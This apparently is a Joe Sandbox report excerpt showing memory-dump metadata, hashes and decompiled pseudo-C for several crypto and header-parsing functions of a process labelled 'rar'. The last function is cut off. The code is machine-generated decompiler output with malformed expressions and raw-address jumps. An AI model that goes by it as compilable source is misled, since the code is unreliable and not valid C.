                                                                                                            0x7ff650b5eb3a
                                                                                                            0x7ff650b5eb44
                                                                                                            0x7ff650b5eb4c
                                                                                                            0x7ff650b5eb53
                                                                                                            0x7ff650b5eb62
                                                                                                            0x7ff650b5eb6a
                                                                                                            0x7ff650b5eb6c
                                                                                                            0x7ff650b5eb76
                                                                                                            0x7ff650b5eb7e
                                                                                                            0x7ff650b5eb85
                                                                                                            0x7ff650b5eb94
                                                                                                            0x7ff650b5eb9c
                                                                                                            0x7ff650b5eb9e
                                                                                                            0x7ff650b5eba8
                                                                                                            0x7ff650b5ebb0
                                                                                                            0x7ff650b5ebb7
                                                                                                            0x7ff650b5ebc0
                                                                                                            0x7ff650b5ebc3
                                                                                                            0x7ff650b5ebc7
                                                                                                            0x7ff650b5ebcc
                                                                                                            0x7ff650b5ebd1
                                                                                                            0x7ff650b5ebd6
                                                                                                            0x7ff650b5ebdb
                                                                                                            0x7ff650b5ebdd
                                                                                                            0x7ff650b5ebe7
                                                                                                            0x7ff650b5ebeb
                                                                                                            0x7ff650b5ebf2
                                                                                                            0x7ff650b5ebfe
                                                                                                            0x7ff650b5ec02
                                                                                                            0x7ff650b5ec04
                                                                                                            0x7ff650b5ec0e
                                                                                                            0x7ff650b5ec12
                                                                                                            0x7ff650b5ec19
                                                                                                            0x7ff650b5ec1b
                                                                                                            0x7ff650b5ec25
                                                                                                            0x7ff650b5ec29
                                                                                                            0x7ff650b5ec47

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 89648d484f20e9c8b2ac32bfea11dc832aa812a939d30ffc6e98f87d91084ec3
                                                                                                            • Instruction ID: 55406397a1e1824ddd00fc26e5ec684bcce74fe813cce395ed8fa80f67990d24
                                                                                                            • Opcode Fuzzy Hash: 89648d484f20e9c8b2ac32bfea11dc832aa812a939d30ffc6e98f87d91084ec3
                                                                                                            • Instruction Fuzzy Hash: 349162366152866BD7188F28C6944EC37D1F74A310B9C8639DB56C779ADF3AF821CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1CA20 Relevance: .2, Instructions: 192COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00007FF67FF650B1CA20(long long __rbx, void* __rcx, long long __rdi, long long __rsi) {
				void* __rbp;
				unsigned char _t93;
				signed int _t106;
				void* _t107;
				signed char _t109;
				signed int _t118;
				void* _t130;
				void* _t132;
				signed int _t134;
				void* _t135;
				unsigned int _t145;
				unsigned char _t149;
				void* _t159;
				void* _t167;
				signed long long _t168;
				long long _t170;
				void* _t171;
				long long _t172;
				void* _t192;
				intOrPtr _t202;
				void* _t216;
				void* _t218;
				void* _t219;
				void* _t221;
				signed long long _t222;
				void* _t224;
				long long _t225;
				void* _t232;
				void* _t235;

				_t213 = __rdi;
				_t172 = __rbx;
				_t167 = _t221;
				 *((long long*)(_t167 + 0x10)) = __rbx;
				 *((long long*)(_t167 + 0x18)) = __rsi;
				 *((long long*)(_t167 + 0x20)) = __rdi;
				_t219 = _t167 - 0x7a8;
				_t222 = _t221 - 0x890;
				_t168 =  *0x50b978f0; // 0x27db226282f1
				 *(_t219 + 0x780) = _t168 ^ _t222;
				_t216 = __rcx;
				E00007FF67FF650B48A20(_t168 ^ _t222, _t222 + 0x20, __rcx);
				_t170 =  *((intOrPtr*)(__rcx + 0x7f88));
				r14d = 0;
				if ( *((intOrPtr*)(__rcx + 0x7f68)) - _t170 > 0) goto 0x50b1cb39;
				E00007FF67FF650B48D0C(_t132, _t135, _t159, __rbx, _t222 + 0x20, __rcx, __rdi, __rcx, _t219, _t224, _t235, _t232);
				E00007FF67FF650B36A38(_t170, __rcx + 0x34a0);
				_t12 = _t235 + 4; // 0x4
				r8d = _t12;
				E00007FF67FF650B48B14(_t172, _t222 + 0x20, _t222 + 0x70, __rcx, _t219, _t224);
				if ((E00007FF67FF650B48A64(_t222 + 0x20) & 0x0000ffff) - 7 >= 0) goto 0x50b1cacb;
				E00007FF67FF650B11534(_t222 + 0x20);
				goto 0x50b1cd57;
				_t93 = E00007FF67FF650B48A48(_t222 + 0x20);
				_t149 = _t93;
				_t225 =  *((intOrPtr*)(_t216 + 0x7f68)) + _t172;
				 *((long long*)(_t216 + 0x7f70)) = _t225;
				 *((intOrPtr*)(_t216 + 0x22ec)) = 1;
				 *(_t216 + 0x7f7d) = _t93 & 0x00000001;
				 *(_t216 + 0x7f7c) = _t93 >> 0x00000003 & 0x00000001;
				 *(_t216 + 0x7f7f) = _t93 >> 0x00000002 & 0x00000001;
				 *(_t216 + 0x34bc) = _t149 >> 0x00000001 & 0x00000001;
				 *(_t216 + 0x34bd) = _t149 >> 0x00000004 & 0x00000001;
				goto 0x50b1cd43;
				E00007FF67FF650B48D0C(E00007FF67FF650B48A64(_t222 + 0x20) & 0x0000ffff, _t93 >> 0x00000003 & 0x00000001, _t159, _t172,  *((intOrPtr*)(_t222 + 0x50)), _t222 + 0x70, _t213, _t216, _t219, _t225);
				E00007FF67FF650B36990(_t172, _t216 + 0x3518, _t222 + 0x70, _t216, _t225);
				 *((intOrPtr*)(_t216 + 0x351c)) = 2;
				 *((intOrPtr*)(_t216 + 0x352c)) = E00007FF67FF650B48A9C(_t222 + 0x20);
				E00007FF67FF650B48A9C(_t222 + 0x20);
				 *((long long*)(_t216 + 0x4588)) = _t170;
				 *((intOrPtr*)(_t216 + 0x4598)) = 1;
				 *(_t216 + 0x459c) = E00007FF67FF650B48A64(_t222 + 0x20) & 0x0000ffff;
				_t106 = E00007FF67FF650B48A64(_t222 + 0x20) & 0x0000ffff;
				 *(_t216 + 0x3524) = _t106;
				if (_t106 - 0x15 < 0) goto 0x50b1cd4a;
				_t107 = E00007FF67FF650B48A9C(_t222 + 0x20);
				 *(_t216 + 0x353c) = E00007FF67FF650B48A48(_t222 + 0x20) & 0x000000ff;
				_t109 = E00007FF67FF650B48A48(_t222 + 0x20);
				asm("bts ecx, 0xf");
				 *(_t216 + 0x3520) = _t109 & 0x000000ff;
				_t192 = _t222 + 0x20;
				E00007FF67FF650B48A48(_t192);
				_t45 = _t192 + 3; // 0xd
				_t144 =  ==  ? _t45 : 0xa;
				 *((intOrPtr*)(_t216 + 0x3534)) =  ==  ? _t45 : 0xa;
				_t134 = E00007FF67FF650B48A48(_t222 + 0x20) & 0x000000ff;
				 *((char*)(_t216 + 0x3538)) = E00007FF67FF650B48A48(_t222 + 0x20);
				 *(_t216 + 0x45c0) =  *(_t216 + 0x3520) & 0x00000001;
				_t145 =  *(_t216 + 0x3520);
				 *(_t216 + 0x45c1) = _t145 >> 0x00000001 & 0x00000001;
				_t118 = _t145 >> 0x00000002 & 1;
				 *(_t216 + 0x45c3) = _t118;
				 *(_t216 + 0x45c4) = _t118;
				 *((long long*)(_t216 + 0x4580)) = _t170;
				 *((long long*)(_t216 + 0x4620)) = 0x10000;
				 *(_t216 + 0x4619) =  *(_t216 + 0x353c) >> 0x00000004 & 0x00000001;
				 *((intOrPtr*)(_t216 + 0x3530)) = r14b;
				 *((intOrPtr*)(_t216 + 0x462c)) = r14d;
				E00007FF67FF650B5BA28(_t107);
				E00007FF67FF650B48D0C(_t134, _t145 >> 0x00000002 & 0x00000001, _t159, _t172, _t222 + 0x20, _t222 + 0x70, _t213, _t216, _t219, _t225);
				r8d = _t134;
				E00007FF67FF650B48B14(_t172, _t222 + 0x20, _t219 - 0x80, _t216, _t219, _t225);
				 *((intOrPtr*)(_t219 + _t172 - 0x80)) = r14b;
				r8d = 0x800;
				E00007FF67FF650B59EEC(_t134, _t170, _t172, _t219 - 0x80, _t219 - 0x80, _t225);
				_t173 = _t216 + 0x3540;
				r8d = 0x800;
				E00007FF67FF650B5D098(_t134, _t216 + 0x3540, _t219 - 0x80, _t216 + 0x3540, _t216, _t225, _t218);
				E00007FF67FF650B1C2E4(_t216 + 0x3540, _t216, _t216 + 0x3540);
				E00007FF67FF650B1C23C(_t173, _t216, _t216 + 0x3518);
				_t202 =  *((intOrPtr*)(_t222 + 0x50));
				if (_t202 == 0) goto 0x50b1cd32;
				r8d =  *(_t216 + 0x3524);
				 *((long long*)(_t216 + 0x7f70)) = _t225 +  *((intOrPtr*)(_t216 + 0x4580)) +  *((intOrPtr*)(_t216 + 0x7f68));
				goto 0x50b1cd39;
				 *((intOrPtr*)(_t216 + 0x22ec)) = 2;
				_t236 =  >  ? _t202 : _t235;
				_t130 = E00007FF67FF650B11534(_t222 + 0x20);
				_t171 =  >  ? _t202 : _t235;
				return E00007FF67FF650B69D10(_t130, _t145 >> 0x00000002 & 0x00000001,  *(_t219 + 0x780) ^ _t222);
			}
































                                                                                                            0x7ff650b1ca20
                                                                                                            0x7ff650b1ca20
                                                                                                            0x7ff650b1ca20
                                                                                                            0x7ff650b1ca23
                                                                                                            0x7ff650b1ca27
                                                                                                            0x7ff650b1ca2b
                                                                                                            0x7ff650b1ca34
                                                                                                            0x7ff650b1ca3b
                                                                                                            0x7ff650b1ca42
                                                                                                            0x7ff650b1ca4c
                                                                                                            0x7ff650b1ca53
                                                                                                            0x7ff650b1ca5e
                                                                                                            0x7ff650b1ca64
                                                                                                            0x7ff650b1ca6b
                                                                                                            0x7ff650b1ca7a
                                                                                                            0x7ff650b1ca84
                                                                                                            0x7ff650b1ca90
                                                                                                            0x7ff650b1ca95
                                                                                                            0x7ff650b1ca95
                                                                                                            0x7ff650b1caa3
                                                                                                            0x7ff650b1cab8
                                                                                                            0x7ff650b1cabf
                                                                                                            0x7ff650b1cac6
                                                                                                            0x7ff650b1cad0
                                                                                                            0x7ff650b1cad5
                                                                                                            0x7ff650b1cade
                                                                                                            0x7ff650b1cae2
                                                                                                            0x7ff650b1cae9
                                                                                                            0x7ff650b1caf8
                                                                                                            0x7ff650b1cb06
                                                                                                            0x7ff650b1cb11
                                                                                                            0x7ff650b1cb1d
                                                                                                            0x7ff650b1cb29
                                                                                                            0x7ff650b1cb34
                                                                                                            0x7ff650b1cb3e
                                                                                                            0x7ff650b1cb4f
                                                                                                            0x7ff650b1cb54
                                                                                                            0x7ff650b1cb68
                                                                                                            0x7ff650b1cb73
                                                                                                            0x7ff650b1cb7a
                                                                                                            0x7ff650b1cb81
                                                                                                            0x7ff650b1cb98
                                                                                                            0x7ff650b1cba8
                                                                                                            0x7ff650b1cbab
                                                                                                            0x7ff650b1cbb4
                                                                                                            0x7ff650b1cbbf
                                                                                                            0x7ff650b1cbd3
                                                                                                            0x7ff650b1cbde
                                                                                                            0x7ff650b1cbe6
                                                                                                            0x7ff650b1cbea
                                                                                                            0x7ff650b1cbf0
                                                                                                            0x7ff650b1cbf5
                                                                                                            0x7ff650b1cbff
                                                                                                            0x7ff650b1cc04
                                                                                                            0x7ff650b1cc07
                                                                                                            0x7ff650b1cc17
                                                                                                            0x7ff650b1cc24
                                                                                                            0x7ff650b1cc32
                                                                                                            0x7ff650b1cc38
                                                                                                            0x7ff650b1cc44
                                                                                                            0x7ff650b1cc50
                                                                                                            0x7ff650b1cc53
                                                                                                            0x7ff650b1cc59
                                                                                                            0x7ff650b1cc65
                                                                                                            0x7ff650b1cc6c
                                                                                                            0x7ff650b1cc82
                                                                                                            0x7ff650b1cc88
                                                                                                            0x7ff650b1cc8f
                                                                                                            0x7ff650b1cc9f
                                                                                                            0x7ff650b1ccab
                                                                                                            0x7ff650b1ccb0
                                                                                                            0x7ff650b1ccbc
                                                                                                            0x7ff650b1ccc1
                                                                                                            0x7ff650b1cccb
                                                                                                            0x7ff650b1ccd6
                                                                                                            0x7ff650b1ccdb
                                                                                                            0x7ff650b1cce2
                                                                                                            0x7ff650b1ccec
                                                                                                            0x7ff650b1ccf7
                                                                                                            0x7ff650b1cd02
                                                                                                            0x7ff650b1cd07
                                                                                                            0x7ff650b1cd16
                                                                                                            0x7ff650b1cd18
                                                                                                            0x7ff650b1cd29
                                                                                                            0x7ff650b1cd30
                                                                                                            0x7ff650b1cd39
                                                                                                            0x7ff650b1cd46
                                                                                                            0x7ff650b1cd4f
                                                                                                            0x7ff650b1cd54
                                                                                                            0x7ff650b1cd82

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 68adc4e902ba4eaaf3bace58773206d1da897e0cf0cfd12959ee25aed26150ba
                                                                                                            • Instruction ID: 9d4760dbf82265cf4b867a347e454ff41ecacd0bb8ff945ac0ca36e33c05fc44
                                                                                                            • Opcode Fuzzy Hash: 68adc4e902ba4eaaf3bace58773206d1da897e0cf0cfd12959ee25aed26150ba
                                                                                                            • Instruction Fuzzy Hash: C391B263A18A82A7D725DB25E4812EEB760F756344F840136D7DF97792DE3DE205CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B19EB8 Relevance: .2, Instructions: 191COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E00007FF67FF650B19EB8(signed int __ecx, long long __rbx, void* __rcx, long long __rdx, void* __r8, long long _a8, char _a40) {
				signed int _v64;
				long long _v72;
				long long _v80;
				char _v88;
				char _v144;
				long long _v152;
				void* __rsi;
				void* __rbp;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t70;
				signed char _t72;
				signed int _t99;
				intOrPtr _t101;
				signed long long _t103;
				void* _t141;
				long long _t143;
				long long _t176;
				long long _t180;
				void* _t183;
				void* _t186;
				void* _t188;
				long long _t192;

				_t186 = __r8;
				_a8 = __rbx;
				_t103 =  *0x50b978f0; // 0x27db226282f1
				_v64 = _t103 ^ _t183 - 0x00000080;
				r15b = r9b;
				_t141 = __r8;
				_v152 = __rdx;
				r14d = 0;
				if ( *((intOrPtr*)(__rcx + 0x22f4)) == r14d) goto 0x50b19f1b;
				_t5 = _t186 + 0x1050; // 0x68d0
				if ( *_t5 == _t192) goto 0x50b19f1b;
				if (r9b == 0) goto 0x50b19f11;
				_t50 = E00007FF67FF650B5B864(_t49, _t5);
				goto 0x50b19f16;
				_t51 = E00007FF67FF650B5B878(_t50, _t5, __rdx);
				goto 0x50b19f1e;
				_t180 = _t192;
				_v88 = _t180;
				if ( *((intOrPtr*)(__rcx + 0x22f8)) == r14d) goto 0x50b19f4e;
				_t8 = _t141 + 0x1058; // 0x68d8
				if ( *_t8 == _t192) goto 0x50b19f4e;
				if (r15b == 0) goto 0x50b19f44;
				_t52 = E00007FF67FF650B5B864(_t51, _t8);
				goto 0x50b19f49;
				_t53 = E00007FF67FF650B5B878(_t52, _t8, __rdx);
				goto 0x50b19f51;
				_t176 = _t192;
				_v80 = _t176;
				if ( *((intOrPtr*)(__rcx + 0x22fc)) == r14d) goto 0x50b19f81;
				_t11 = _t141 + 0x1060; // 0x68e0
				if ( *_t11 == _t192) goto 0x50b19f81;
				if (r15b == 0) goto 0x50b19f77;
				_t54 = E00007FF67FF650B5B864(_t53, _t11);
				goto 0x50b19f7c;
				E00007FF67FF650B5B878(_t54, _t11, __rdx);
				goto 0x50b19f84;
				_t143 = _t192;
				_v72 = _t143;
				if (_t180 != 0) goto 0x50b19f9b;
				if (_t176 != 0) goto 0x50b19f9b;
				if (_t143 == 0) goto 0x50b1a123;
				_t13 =  &_v144; // -149
				E00007FF67FF650B48E10(_t103 ^ _t183 - 0x00000080, _t13);
				r13d = 3;
				_t14 =  &_v144; // -85
				E00007FF67FF650B490D4(_t70, _t143, _t14, __rdx);
				asm("inc ebp");
				r14b = r14b & 0x00000008;
				asm("sbb cl, cl");
				_t72 = __ecx & 0x00000004;
				r14b = r14b | _t72;
				asm("sbb cl, cl");
				r14b = r14b | _t72 & 0x00000002;
				r14b = r14b | r15b;
				if (r15b == 0) goto 0x50b1a062;
				if (_a40 == 0) goto 0x50b1a062;
				if (_t180 != ((_t180 - __rdx >> 1) + __rdx >> 0x1d) * 0x3b9aca00) goto 0x50b1a05e;
				if (_t176 != ((_t176 - __rdx >> 1) + __rdx >> 0x1d) * 0x3b9aca00) goto 0x50b1a05e;
				if (_t143 == ((_t143 - __rdx >> 1) + __rdx >> 0x1d) * 0x3b9aca00) goto 0x50b1a062;
				r14b = r14b | 0x00000010;
				_t28 =  &_v144; // -85
				E00007FF67FF650B490D4(_t70, _t143, _t28, __rdx);
				_t29 =  &_v88; // -29
				if ( *_t29 == 0) goto 0x50b1a0b7;
				_t99 = r15b;
				if (_t99 == 0) goto 0x50b1a0ab;
				_t34 =  &_v144; // -85
				_t160 = _t34;
				E00007FF67FF650B48F70(_t72 & 0x00000002, _t29, _t34, __rdx + ( *_t29 - __rdx >> 1) >> 0x1d, _t186);
				goto 0x50b1a0b7;
				_t35 =  &_v144; // -85
				E00007FF67FF650B48FF4(_t72 & 0x00000002, _t99, _t29, _t35, _t34, 0x6d694b2f, _t186, _t188);
				if (_t99 != 0) goto 0x50b1a080;
				if ((r14b & 0x00000010) == 0) goto 0x50b1a109;
				_t38 =  &_v88; // -29
				_t101 =  *_t38;
				if (_t101 == 0) goto 0x50b1a0ff;
				_t43 =  &_v144; // -85
				E00007FF67FF650B48F70(_t72 & 0x00000002, _t38, _t43,  *_t38 - (( *_t38 - _t34 >> 1) + _t160 >> 0x1d) * 0x3b9aca00, _t186);
				if (_t101 != 0) goto 0x50b1a0cb;
				_t45 =  &_v144; // -85
				E00007FF67FF650B19C9C(_t72 & 0x00000002, _t101, _t38 + 8, _t45, 0x6d694b2f, _t183, _v152);
				_t46 =  &_v144; // -85
				return E00007FF67FF650B69D10(E00007FF67FF650B11534(_t46), _t72 & 0x00000002, _v64 ^ _t183 - 0x00000080);
			}






























                                                                                                            0x7ff650b19eb8
                                                                                                            0x7ff650b19eb8
                                                                                                            0x7ff650b19ed2
                                                                                                            0x7ff650b19edc
                                                                                                            0x7ff650b19ee0
                                                                                                            0x7ff650b19ee3
                                                                                                            0x7ff650b19ee6
                                                                                                            0x7ff650b19eed
                                                                                                            0x7ff650b19ef7
                                                                                                            0x7ff650b19ef9
                                                                                                            0x7ff650b19f03
                                                                                                            0x7ff650b19f08
                                                                                                            0x7ff650b19f0a
                                                                                                            0x7ff650b19f0f
                                                                                                            0x7ff650b19f11
                                                                                                            0x7ff650b19f19
                                                                                                            0x7ff650b19f1b
                                                                                                            0x7ff650b19f1e
                                                                                                            0x7ff650b19f2a
                                                                                                            0x7ff650b19f2c
                                                                                                            0x7ff650b19f36
                                                                                                            0x7ff650b19f3b
                                                                                                            0x7ff650b19f3d
                                                                                                            0x7ff650b19f42
                                                                                                            0x7ff650b19f44
                                                                                                            0x7ff650b19f4c
                                                                                                            0x7ff650b19f4e
                                                                                                            0x7ff650b19f51
                                                                                                            0x7ff650b19f5d
                                                                                                            0x7ff650b19f5f
                                                                                                            0x7ff650b19f69
                                                                                                            0x7ff650b19f6e
                                                                                                            0x7ff650b19f70
                                                                                                            0x7ff650b19f75
                                                                                                            0x7ff650b19f77
                                                                                                            0x7ff650b19f7f
                                                                                                            0x7ff650b19f81
                                                                                                            0x7ff650b19f84
                                                                                                            0x7ff650b19f8b
                                                                                                            0x7ff650b19f90
                                                                                                            0x7ff650b19f95
                                                                                                            0x7ff650b19f9b
                                                                                                            0x7ff650b19f9f
                                                                                                            0x7ff650b19fa5
                                                                                                            0x7ff650b19fae
                                                                                                            0x7ff650b19fb2
                                                                                                            0x7ff650b19fbd
                                                                                                            0x7ff650b19fc0
                                                                                                            0x7ff650b19fca
                                                                                                            0x7ff650b19fcc
                                                                                                            0x7ff650b19fcf
                                                                                                            0x7ff650b19fd8
                                                                                                            0x7ff650b19fdd
                                                                                                            0x7ff650b19fe0
                                                                                                            0x7ff650b19ff0
                                                                                                            0x7ff650b19ff6
                                                                                                            0x7ff650b1a018
                                                                                                            0x7ff650b1a03a
                                                                                                            0x7ff650b1a05c
                                                                                                            0x7ff650b1a05e
                                                                                                            0x7ff650b1a066
                                                                                                            0x7ff650b1a06a
                                                                                                            0x7ff650b1a06f
                                                                                                            0x7ff650b1a086
                                                                                                            0x7ff650b1a088
                                                                                                            0x7ff650b1a08b
                                                                                                            0x7ff650b1a0a0
                                                                                                            0x7ff650b1a0a0
                                                                                                            0x7ff650b1a0a4
                                                                                                            0x7ff650b1a0a9
                                                                                                            0x7ff650b1a0ae
                                                                                                            0x7ff650b1a0b2
                                                                                                            0x7ff650b1a0bf
                                                                                                            0x7ff650b1a0c5
                                                                                                            0x7ff650b1a0c7
                                                                                                            0x7ff650b1a0ce
                                                                                                            0x7ff650b1a0d1
                                                                                                            0x7ff650b1a0f6
                                                                                                            0x7ff650b1a0fa
                                                                                                            0x7ff650b1a107
                                                                                                            0x7ff650b1a10d
                                                                                                            0x7ff650b1a114
                                                                                                            0x7ff650b1a11a
                                                                                                            0x7ff650b1a149

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1543ff7b670f491839e0e8986332a14596d1eff49cbe03838c86cbbe8f1d8653
                                                                                                            • Instruction ID: 52216b034aed38ab4fb88a770bc5bdc8c13868bdf40a478b3bccbcbeaa69b277
                                                                                                            • Opcode Fuzzy Hash: 1543ff7b670f491839e0e8986332a14596d1eff49cbe03838c86cbbe8f1d8653
                                                                                                            • Instruction Fuzzy Hash: 3F610112F0978B72FE149A6596852BD27A16F46BC4F4C4431CE0FEB799DE3EF8468200
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5550C Relevance: .2, Instructions: 181COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E00007FF67FF650B5550C(signed int __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, long long _a24, long long _a32) {
				signed int _v56;
				char _v68;
				signed int _v69;
				signed int _v70;
				signed int _v71;
				signed int _v72;
				void* _v73;
				void* _v74;
				void* _v75;
				void* _v76;
				char _v84;
				signed int _v85;
				signed int _v86;
				signed int _v87;
				signed char _v88;
				signed char _t113;
				signed long long _t119;
				void* _t132;
				void* _t133;
				signed long long _t144;
				void* _t148;
				void* _t150;
				signed long long _t154;
				signed long long _t176;
				void* _t177;
				void* _t178;
				void* _t183;
				void* _t187;
				intOrPtr _t196;
				void* _t200;
				void* _t201;
				void* _t202;
				void* _t205;

				_t152 = __rbx;
				_a24 = __rbx;
				_a32 = __rsi;
				_t184 = _t183 - 0x30;
				_t144 =  *0x50b978f0; // 0x27db226282f1
				_v56 = _t144 ^ _t183 - 0x00000030;
				r14d =  *((intOrPtr*)(__rcx + 4));
				asm("movups xmm0, [edx]");
				r14d = r14d - 6;
				r11d = 0;
				_t196 = r14d;
				_t5 = _t178 + 4; // 0x4
				r12d = _t5;
				asm("movups xmm1, [edx+0x10]");
				asm("movups [ebp-0x30], xmm0");
				asm("movups [ebp-0x20], xmm1");
				if (r14d <= 0) goto 0x50b555cf;
				r8d = 0;
				if (0 -  *((intOrPtr*)(__rcx + 4)) > 0) goto 0x50b5573a;
				if (__r8 - _t196 >= 0) goto 0x50b5559c;
				_t7 =  &_v88; // 0x240
				if (__rdx - _t205 >= 0) goto 0x50b5559c;
				 *((intOrPtr*)(__rcx + 0x18 + (__rdx + __rbx * 4) * 4)) =  *((intOrPtr*)(_t7 + __r8 * 4));
				_t187 = __r8 + 1;
				r11d = r11d + 1;
				if (_t187 - _t196 < 0) goto 0x50b5557b;
				_t84 =  !=  ? 0 : _t178 + 1;
				_t119 =  !=  ? 0 : _t178 + 1;
				_t86 =  !=  ? r11d : 0;
				r11d =  !=  ? r11d : 0;
				_t16 = _t152 + 1; // 0x1
				_t147 =  !=  ? __rbx : _t16;
				_t148 =  !=  ? __rdx + 1 :  !=  ? __rbx : _t16;
				if (_t187 - _t196 < 0) goto 0x50b55565;
				if (_t119 -  *((intOrPtr*)(__rcx + 4)) > 0) goto 0x50b5573a;
				_t200 = r11d;
				_t154 = _t119;
				_t113 = _v88 ^  *(_t148 + 0x50b97210);
				_v88 = _t113;
				_v87 = _v87 ^  *(_t148 + 0x50b97210);
				_v86 = _v86 ^  *(_t148 + 0x50b97210);
				_v88 = _t113 ^  *0x50b97310;
				_v85 = _v85 ^  *(_t148 + 0x50b97210);
				if (r14d == 8) goto 0x50b5565d;
				_t132 = _t196 - 1;
				if (_t132 <= 0) goto 0x50b556d3;
				_t43 =  &_v84; // 0x244
				 *_t43 =  *_t43 ^  *(_t43 - 4);
				if (_t132 != 0) goto 0x50b55647;
				if (_t132 != 0) goto 0x50b55644;
				goto 0x50b556cf;
				_t46 =  &_v84; // 0x244
				_t161 = _t46;
				r8d = 3;
				 *_t161 =  *_t46 ^  *(_t46 - 4);
				if (_t132 != 0) goto 0x50b5566a;
				if (_t132 != 0) goto 0x50b55667;
				_v72 = _v72 ^  *(_t148 + 0x50b97210);
				_v71 = _v71 ^  *(_t148 + 0x50b97210);
				_v70 = _v70 ^  *(_t148 + 0x50b97210);
				_v69 = _v69 ^  *(_t148 + 0x50b97210);
				_t133 = _t196 - 5;
				if (_t133 <= 0) goto 0x50b556d3;
				_t64 =  &_v68; // 0x254
				 *_t64 =  *_t64 ^  *(_t64 - 4);
				_t176 = _t205 - 1;
